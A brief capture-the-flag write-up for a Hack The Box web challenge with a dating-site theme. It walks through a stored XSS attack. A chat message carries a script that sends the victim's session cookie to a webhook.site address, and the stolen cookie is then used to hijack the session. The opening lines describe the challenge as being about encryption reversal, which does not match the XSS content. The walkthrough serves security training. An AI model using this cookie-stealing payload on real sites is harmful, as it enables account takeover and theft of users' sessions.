Explore the basics of cybersecurity in the OnlyHacks Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/860

Description#

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation#

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a link from https://webhook.site/ and replace the provided link with your unique one.

Demonstrate an xss by saying:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Lastly, paste the captured cookie into the designated page and refresh.

Summary#

The OnlyHacks Challenge on Hack The Box is a very-easy web challenge that involves Cross-Site Scripting (XSS) to steal session cookies. Participants register on a dating-themed platform, start a conversation, and inject a malicious JavaScript payload that sends the victim’s session cookie to a controlled webhook endpoint. By capturing and using the stolen cookie, they gain unauthorized access, demonstrating the impact of client-side script injection. The challenge highlights the dangers of improper input sanitization and emphasizes the need for secure handling of user-generated content to prevent XSS attacks.